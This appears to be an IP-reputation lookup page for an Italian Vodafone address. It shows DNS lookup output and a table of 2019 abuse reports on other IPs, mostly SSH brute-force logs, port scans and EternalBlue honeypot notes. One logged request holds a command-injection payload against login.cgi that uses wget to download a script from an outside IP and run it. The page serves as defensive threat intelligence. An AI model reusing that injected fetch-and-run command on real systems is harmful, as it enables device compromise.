City: Ravenna
Region: Regione Emilia-Romagna
Country: Italy
Internet Service Provider: Vodafone
Hostname: unknown
Organization: unknown
Usage Type: unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 2.44.71.214
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 63192
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;2.44.71.214. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025012802 1800 900 604800 86400
;; Query time: 13 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Jan 29 08:26:40 CST 2025
;; MSG SIZE rcvd: 104
214.71.44.2.in-addr.arpa domain name pointer net-2-44-71-214.cust.vodafonedsl.it.
Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
214.71.44.2.in-addr.arpa name = net-2-44-71-214.cust.vodafonedsl.it.
Authoritative answers can be found from:
| IP | Type | Details | Datetime |
|---|---|---|---|
| 177.221.97.235 | attackspam | failed_logins |
2019-07-06 02:04:56 |
| 121.147.191.33 | attackspambots | Jul 5 20:11:56 mout sshd[30129]: Invalid user 111 from 121.147.191.33 port 38492 Jul 5 20:11:58 mout sshd[30129]: Failed password for invalid user 111 from 121.147.191.33 port 38492 ssh2 Jul 5 20:11:58 mout sshd[30129]: Connection closed by 121.147.191.33 port 38492 [preauth] |
2019-07-06 02:12:41 |
| 195.12.49.148 | attack | NAME : M247-LTD-Manchester CIDR : 195.12.49.0/24 DDoS attack United Kingdom - block certain countries :) IP: 195.12.49.148 Denial-of-Service Attack (DoS) Detected and Blocked by ADMIN - data recovery https://help-dysk.pl |
2019-07-06 02:23:37 |
| 83.110.236.109 | attackspambots | @LucianNitescu Personal Honeypot Network <<<>>> Donate at paypal.me/LNitescu <<<>>> 2019-07-05 06:39:36,790 INFO [shellcode_manager] (83.110.236.109) no match, writing hexdump (fbd39ba4aea53a1637e0adcb56f6a4ea :2170652) - MS17010 (EternalBlue) |
2019-07-06 01:57:33 |
| 185.174.176.20 | attack | WP Authentication failure |
2019-07-06 01:53:55 |
| 106.13.6.61 | attackbotsspam | 106.13.6.61 - - [05/Jul/2019:09:49:47 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://142.93.64.50/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 166 "-" "Hakai/2.0" ... |
2019-07-06 02:11:37 |
| 148.70.226.228 | attackbots | Jul 5 20:06:35 mail sshd\[21399\]: Invalid user robin from 148.70.226.228 port 43710 Jul 5 20:06:35 mail sshd\[21399\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=148.70.226.228 Jul 5 20:06:37 mail sshd\[21399\]: Failed password for invalid user robin from 148.70.226.228 port 43710 ssh2 Jul 5 20:09:29 mail sshd\[21871\]: Invalid user oracle from 148.70.226.228 port 39792 Jul 5 20:09:29 mail sshd\[21871\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=148.70.226.228 |
2019-07-06 02:18:45 |
| 142.0.135.153 | attackspam | firewall-block, port(s): 445/tcp |
2019-07-06 01:56:50 |
| 107.170.192.149 | attackbots | 2222/tcp 5672/tcp 49156/tcp... [2019-05-06/07-05]65pkt,48pt.(tcp),4pt.(udp) |
2019-07-06 02:20:31 |
| 212.118.47.209 | attackspambots | @LucianNitescu Personal Honeypot Network <<<>>> Donate at paypal.me/LNitescu <<<>>> 2019-07-05 16:18:31,974 INFO [shellcode_manager] (212.118.47.209) no match, writing hexdump (98228e894696cd0c283cc0cdb221568f :897591) - MS17010 (EternalBlue) |
2019-07-06 02:40:03 |
| 36.89.146.252 | attack | Jul 5 15:18:33 ip-172-31-62-245 sshd\[21964\]: Invalid user sa from 36.89.146.252\ Jul 5 15:18:35 ip-172-31-62-245 sshd\[21964\]: Failed password for invalid user sa from 36.89.146.252 port 51058 ssh2\ Jul 5 15:21:17 ip-172-31-62-245 sshd\[22004\]: Invalid user mediatomb from 36.89.146.252\ Jul 5 15:21:19 ip-172-31-62-245 sshd\[22004\]: Failed password for invalid user mediatomb from 36.89.146.252 port 18720 ssh2\ Jul 5 15:23:55 ip-172-31-62-245 sshd\[22008\]: Invalid user ourhomes from 36.89.146.252\ |
2019-07-06 02:07:05 |
| 89.248.174.3 | attackspambots | 4500/tcp 591/tcp 514/tcp... [2019-05-05/07-05]2820pkt,155pt.(tcp) |
2019-07-06 02:37:06 |
| 103.195.179.224 | attack | @LucianNitescu Personal Honeypot Network <<<>>> Donate at paypal.me/LNitescu <<<>>> 2019-07-05 06:39:34,613 INFO [shellcode_manager] (103.195.179.224) no match, writing hexdump (0991f7001cbbf1940a5aa4f4f664b78c :2018399) - MS17010 (EternalBlue) |
2019-07-06 02:07:58 |
| 187.190.235.43 | attack | $f2bV_matches |
2019-07-06 02:23:58 |
| 213.47.38.104 | attack | Automated report - ssh fail2ban: Jul 5 19:41:03 authentication failure Jul 5 19:41:05 wrong password, user=git, port=34710, ssh2 Jul 5 20:11:43 authentication failure |
2019-07-06 02:25:19 |